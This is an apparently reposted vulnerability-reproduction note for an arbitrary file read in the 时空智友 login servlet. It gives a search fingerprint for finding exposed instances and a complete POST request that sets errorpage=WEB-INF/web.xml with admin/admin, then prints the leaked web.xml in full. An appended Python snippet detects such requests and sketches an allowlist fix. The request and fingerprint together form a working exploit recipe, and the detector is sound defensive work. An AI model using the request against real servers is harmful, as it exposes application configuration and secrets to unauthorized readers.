Disclaimer
Most articles on this public account come from the author's daily study notes; some are reposted with the original author's authorization or from other whitelisted public accounts. Reposting without authorization is strictly prohibited; to repost, contact us for whitelisting. Do not use the techniques described in these articles for illegal testing; the author and this public account bear no responsibility for any adverse consequences arising from such use.
Asset discovery
web.icon=="2464cbce5dd2681dd4fb62d055520d78"
Vulnerability reproduction
Construct the request
POST /login HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=2FA8E20E8AD7DA8D9E894C85B1305755; __qypid=""
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 101
op=verify%7Clogin&targetpage=&errorpage=WEB-INF/web.xml&mark=&tzo=480&username=admin&password=admin
If a response roughly like the following comes back, the read succeeded: the body is the application's own WEB-INF/web.xml, served with Content-Type: application/xml.
HTTP/1.1 200
Server: nginx
Date: Thu, 21 Sep 2023 06:36:03 GMT
Content-Type: application/xml
Connection: close
Set-Cookie: JSESSIONID=80ECB18D62EF5F079077494813915E39; Path=/; HttpOnly
Accept-Ranges: bytes
ETag: W/"18123-1640592102000"
Last-Modified: Mon, 27 Dec 2021 08:01:42 GMT
Content-Length: 18123
<web-app id="WebApp_ID" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
<display-name>artery</display-name>
<welcome-file-list>
<welcome-file>index.html</welcome-file>
<welcome-file>index.jsp</welcome-file>
</welcome-file-list>
<listener>
<listener-class>com.artery.portal.listener.ServletContextListener</listener-class>
</listener>
<listener>
<listener-class>com.artery.portal.listener.HttpSessionListener</listener-class>
</listener>
<servlet>
<servlet-name>PortalDriverServlet</servlet-name>
<servlet-class>com.artery.portal.driver.PortalDriverServlet</servlet-class>
<init-param>
<param-name>charset</param-name>
<param-value>utf-8</param-value>
</init-param>
</servlet>
<servlet>
<servlet-name>ArteryPortlet</servlet-name>
<servlet-class>org.apache.pluto.container.driver.PortletServlet</servlet-class>
<init-param>
<param-name>portlet-name</param-name>
<param-value>ArteryPortlet</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet>
<servlet-name>AdapterServlet</servlet-name>
<servlet-class>com.artery.adapters.AdapterServlet</servlet-class>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet>
<servlet-name>PadService</servlet-name>
<servlet-class>com.artery.portal.PadService</servlet-class>
</servlet>
<servlet>
<servlet-name>MessageService</servlet-name>
<servlet-class>com.artery.portal.MessageDispatcher</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>MessageService</servlet-name>
<url-pattern>/message</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>PadService</servlet-name>
<url-pattern>/pad</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>PortalDriverServlet</servlet-name>
<url-pattern>/portal/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>ArteryPortlet</servlet-name>
<url-pattern>/PlutoInvoker/ArteryPortlet</url-pattern>
</servlet-mapping>
<!-- ##########portal################# -->
<servlet>
<servlet-name>formlocalizer</servlet-name>
<servlet-class>org.apache.pluto.container.driver.PortletServlet</servlet-class>
<init-param>
<param-name>portlet-name</param-name>
<param-value>formlocalizer</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>formlocalizer</servlet-name>
<url-pattern>/PlutoInvoker/formlocalizer</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>collection</servlet-name>
<servlet-class>org.apache.pluto.container.driver.PortletServlet</servlet-class>
<init-param>
<param-name>portlet-name</param-name>
<param-value>collection</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>collection</servlet-name>
<url-pattern>/PlutoInvoker/collection</url-pattern>
</servlet-mapping>
<!-- ########################### -->
<servlet>
<servlet-name>thtml</servlet-name>
<servlet-class>com.artery.portal.TemplateServlet</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>thtml</servlet-name>
<url-pattern>*.thtml</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>vhtml</servlet-name>
<servlet-class>com.artery.portal.TemplateServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>vhtml</servlet-name>
<url-pattern>*.vhtml</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>formdispatcher</servlet-name>
<servlet-class>com.artery.form.FormServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>formdispatcher</servlet-name>
<url-pattern>*.form</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>programdispatcher</servlet-name>
<servlet-class>com.artery.portal.ProgramDispatcher</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>programdispatcher</servlet-name>
<url-pattern>*.prog</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>formservice</servlet-name>
<servlet-class>com.artery.form.FormService</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>formservice</servlet-name>
<url-pattern>/formservice/*</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>login</servlet-name>
<servlet-class>com.artery.portal.LoginServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>login</servlet-name>
<url-pattern>/login/*</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>verifycode</servlet-name>
<servlet-class>com.artery.portal.util.VerifyCodeGenerator</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>verifycode</servlet-name>
<url-pattern>/verifycode/*</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>workflow</servlet-name>
<servlet-class>com.artery.workflow.WorkflowServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>workflow</servlet-name>
<url-pattern>*.workflow</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>template</servlet-name>
<servlet-class>com.artery.km.TemplateServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>template</servlet-name>
<url-pattern>*.vm</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>template</servlet-name>
<url-pattern>*.do</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>img</servlet-name>
<servlet-class>com.artery.form.ImageServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>img</servlet-name>
<url-pattern>*.img</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>img</servlet-name>
<url-pattern>/attachment/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>img</servlet-name>
<url-pattern>/attachments/*</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>thumbnail</servlet-name>
<servlet-class>com.artery.form.ImageServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>thumbnail</servlet-name>
<url-pattern>/thumbnail/*</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>thumbm</servlet-name>
<servlet-class>com.artery.form.ImageServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>thumbm</servlet-name>
<url-pattern>/thumbm/*</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>thumbl</servlet-name>
<servlet-class>com.artery.form.ImageServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>thumbl</servlet-name>
<url-pattern>/thumbl/*</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>thumbcutl</servlet-name>
<servlet-class>com.artery.form.ImageServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>thumbcutl</servlet-name>
<url-pattern>/thumbcutl/*</url-pattern>
</servlet-mapping>
<!-- ###############auth认证#################### -->
<!-- server -->
<servlet>
<description>服务器端认证</description>
<servlet-name>authorization</servlet-name>
<servlet-class>com.qy960.oauth2server.servlets.Authorization</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>authorization</servlet-name>
<url-pattern>/oauth2/authorization</url-pattern>
</servlet-mapping>
<servlet>
<description>服务器端认证返回</description>
<servlet-name>authorizeresult</servlet-name>
<servlet-class>com.qy960.oauth2server.servlets.AuthorizationResult</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>authorizeresult</servlet-name>
<url-pattern>/oauth2/authorizationResult</url-pattern>
</servlet-mapping>
<servlet>
<description>服务器端认证AccessToken令牌</description>
<servlet-name>AccessToken</servlet-name>
<servlet-class>com.qy960.oauth2server.servlets.AccessToken</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>AccessToken</servlet-name>
<url-pattern>/oauth2/access_token</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>OauthLogin</servlet-name>
<servlet-class>com.qy960.oauth2server.servlets.Login</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>OauthLogin</servlet-name>
<url-pattern>/oauth2/login</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>OauthResetPwd</servlet-name>
<servlet-class>com.qy960.oauth2server.servlets.ResetPwd</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>OauthResetPwd</servlet-name>
<url-pattern>/oauth2/resetpwd</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>OauthThirdlogin</servlet-name>
<servlet-class>com.qy960.oauth2server.servlets.Thirdlogin</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>OauthThirdlogin</servlet-name>
<url-pattern>/oauth2/thirdlogin</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>OauthThirdRegister</servlet-name>
<servlet-class>com.qy960.oauth2server.servlets.ThirdRegister</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>OauthThirdRegister</servlet-name>
<url-pattern>/oauth2/thirdRegister</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>uploadServlet</servlet-name>
<servlet-class>com.artery.util.ServletUpload</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>uploadServlet</servlet-name>
<url-pattern>/upload/uploadimg</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>DetailOrderServlet</servlet-name>
<servlet-class>com.artery.util.DetailOrderServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DetailOrderServlet</servlet-name>
<url-pattern>/detail/detailorder</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>MemberRegisteServlet</servlet-name>
<servlet-class>com.artery.util.MemberRegisteServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>MemberRegisteServlet</servlet-name>
<url-pattern>/member/memberregist</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>LoginwxServlet</servlet-name>
<servlet-class>com.artery.util.LoginwxServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginwxServlet</servlet-name>
<url-pattern>/getway/loginwz_new</url-pattern>
</servlet-mapping>
<!-- client -->
<servlet>
<description>客户端认证AccessToken令牌</description>
<servlet-name>ClientAccessToken</servlet-name>
<servlet-class>com.artery.qy.portal.oauth2.client.AccessToken</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>ClientAccessToken</servlet-name>
<url-pattern>/oauth2/client/accesstoken</url-pattern>
</servlet-mapping>
<!-- 卡充值 -->
<servlet>
<servlet-name>carpackageServlet</servlet-name>
<servlet-class>com.artery.util.carpackageServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>carpackageServlet</servlet-name>
<url-pattern>/artery/util/carpackageServlet</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>CarpayServlet</servlet-name>
<servlet-class>com.artery.util.CarpayServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>CarpayServlet</servlet-name>
<url-pattern>/artery/util/CarpayServlet</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>CarqrypeopleServlet</servlet-name>
<servlet-class>com.artery.util.CarqrypeopleServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>CarqrypeopleServlet</servlet-name>
<url-pattern>/artery/util/CarqrypeopleServlet</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>ArteryAxisServlet</servlet-name>
<display-name>ArteryAxisServlet</display-name>
<servlet-class>
org.apache.axis.transport.http.AxisServlet
</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>ArteryAxisServlet</servlet-name>
<url-pattern>/services/*</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>rest-invoker</servlet-name>
<servlet-class>com.artery.rest.RestService</servlet-class>
<init-param>
<param-name>rest-config</param-name>
<param-value>/rests.xml</param-value>
</init-param>
</servlet>
<!-- Mapping -->
<servlet-mapping>
<servlet-name>rest-invoker</servlet-name>
<url-pattern>/rest/*</url-pattern>
</servlet-mapping>
<!-- ###############auth认证#################### -->
<filter>
<filter-name>ArterySecurity</filter-name>
<filter-class>com.artery.security.ContentFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>ArterySecurity</filter-name>
<url-pattern>/login/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>ArterySecurity</filter-name>
<url-pattern>/oauth2/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>ArterySecurity</filter-name>
<url-pattern>*.vhtml</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>ArterySecurity</filter-name>
<url-pattern>*.form</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>ArterySecurity</filter-name>
<url-pattern>*.prog</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>ArterySecurity</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>
<filter>
<filter-name>ArteryFilter</filter-name>
<filter-class>com.artery.portal.filters.ArteryFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>ArteryFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter>
<filter-name>GetWeixAppidFilter</filter-name>
<filter-class>com.artery.portal.filters.GetWeixAppidFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>GetWeixAppidFilter</filter-name>
<url-pattern>/oauth2/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>GetWeixAppidFilter</filter-name>
<url-pattern>/login/*</url-pattern>
</filter-mapping>
<filter>
<filter-name>protalfilter</filter-name>
<filter-class>com.artery.portal.PortalFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>protalfilter</filter-name>
<url-pattern>*.prog</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>protalfilter</filter-name>
<url-pattern>*.form</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>protalfilter</filter-name>
<url-pattern>*.workflow</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>protalfilter</filter-name>
<url-pattern>*.thtml</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>protalfilter</filter-name>
<url-pattern>*.vhtml</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>protalfilter</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>
<filter>
<filter-name>EntAuthorizationFilter</filter-name>
<filter-class>com.artery.portal.EntAuthorizationFilter</filter-class>
<init-param>
<param-name>entids</param-name>
<param-value>E0IJ58MFKKXG,2016-06-29</param-value>
</init-param>
</filter>
<filter-mapping>
<filter-name>EntAuthorizationFilter</filter-name>
<url-pattern>*.prog</url-pattern>
</filter-mapping>
<filter>
<filter-name>WEBAuthorizationFilter</filter-name>
<filter-class>com.artery.portal.filters.WEBAuthorizationFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>WEBAuthorizationFilter</filter-name>
<url-pattern>/formservice</url-pattern>
</filter-mapping>
<session-config>
<session-timeout>300</session-timeout>
</session-config>
<jsp-config>
<taglib>
<taglib-uri>http://java.sun.com/portlet</taglib-uri>
<taglib-location>/WEB-INF/tld/portlet.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://portals.apache.org/pluto/portlet-el</taglib-uri>
<taglib-location>/WEB-INF/tld/portlet-el.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://portals.apache.org/pluto</taglib-uri>
<taglib-location>/WEB-INF/tld/pluto.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://race.qy960.com</taglib-uri>
<taglib-location>/WEB-INF/qy960.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://race.qy960.com/race</taglib-uri>
<taglib-location>/WEB-INF/race.tld</taglib-location>
</taglib>
</jsp-config>
<error-page>
<error-code>401</error-code>
<location>/WEB-INF/jsps/error401.jsp</location>
</error-page>
<error-page>
<error-code>404</error-code>
<location>/WEB-INF/jsps/error404.jsp</location>
</error-page>
<error-page>
<exception-type>java.lang.Exception</exception-type>
<location>/WEB-INF/jsps/error.jsp</location>
</error-page>
<security-constraint>
<web-resource-collection>
<web-resource-name>Artery Manager</web-resource-name>
<url-pattern>/setup/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>manager</role-name>
</auth-constraint>
</security-constraint>
<!-- Define the Login Configuration for this Application -->
<login-config>
<auth-method>BASIC</auth-method>
<realm-name>Artery Manager Application</realm-name>
</login-config>
<!-- Security roles referenced by this web application -->
<security-role>
<description>
The role that is required to log in to the Manager Application
</description>
<role-name>manager</role-name>
</security-role>
<filter>
<filter-name>eaiTokenFilter</filter-name>
<filter-class>zyservice.eai.token.CheckTokenFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>eaiTokenFilter</filter-name>
<url-pattern>/rest/eai/*</url-pattern>
</filter-mapping>
</web-app>
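The request above works because a server-relative file path placed in the login servlet's errorpage parameter is returned as the response body. As an added example (not code from the original article or from the vendor), the following flags form bodies whose errorpage/targetpage values reach WEB-INF or use traversal, and shows an allowlist-based way to handle such page parameters; REDIRECT_PARAMS, PROTECTED_DIRS and ALLOWED_PAGES are assumptions, and SAMPLE_BODY is the body shown in the article.

```python
"""Flag /login requests whose errorpage/targetpage parameters point into
WEB-INF or escape the web root, plus an allowlist-based mitigation pattern.
Added example, not code from the original article or the vendor; assumes
the POST body is visible to the inspecting component (WAF or body-logging proxy).
"""
import posixpath
from urllib.parse import parse_qs, unquote

# Page-selecting parameters seen in the article's request.
REDIRECT_PARAMS = ("errorpage", "targetpage")
# Directories that must never be reachable through a page parameter.
PROTECTED_DIRS = ("web-inf", "meta-inf")
# Constructed allowlist for the mitigation; a deployment lists its own pages.
ALLOWED_PAGES = {"login.jsp", "index.jsp", "error.jsp"}
# Form body as shown in the article (errorpage=WEB-INF/web.xml is the point).
SAMPLE_BODY = ("op=verify%7Clogin&targetpage=&errorpage=WEB-INF/web.xml"
               "&mark=&tzo=480&username=admin&password=admin")


def decode(value: str) -> str:
    """Undo up to three layers of percent-encoding and unify separators."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def suspicious_path(value: str) -> bool:
    """True if the value uses '..' or resolves into a protected directory."""
    decoded = decode(value)
    if ".." in decoded.split("/"):
        return True
    norm = posixpath.normpath("/" + decoded).lower()
    return any(part in PROTECTED_DIRS for part in norm.split("/"))


def inspect_login_body(body: str) -> list:
    """Return 'name=value' findings for one form-urlencoded login body."""
    params = parse_qs(body, keep_blank_values=True)
    return [f"{name}={raw}" for name in REDIRECT_PARAMS
            for raw in params.get(name, []) if raw and suspicious_path(raw)]


def safe_redirect_target(value: str, default: str = "login.jsp") -> str:
    """Mitigation pattern: accept only a bare file name from the allowlist."""
    name = posixpath.basename(decode(value))
    return name if name == value and name in ALLOWED_PAGES else default


if __name__ == "__main__":
    print(inspect_login_body(SAMPLE_BODY))  # ['errorpage=WEB-INF/web.xml']
    print(safe_redirect_target("WEB-INF/web.xml"))  # login.jsp
```

The decoder unwraps double percent-encoding and backslashes before checking, since a single-pass pattern match on the raw body misses those variants.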
Originally published on the WeChat official account Devil安全: [Vulnerability reproduction] 时空智友 Login arbitrary file read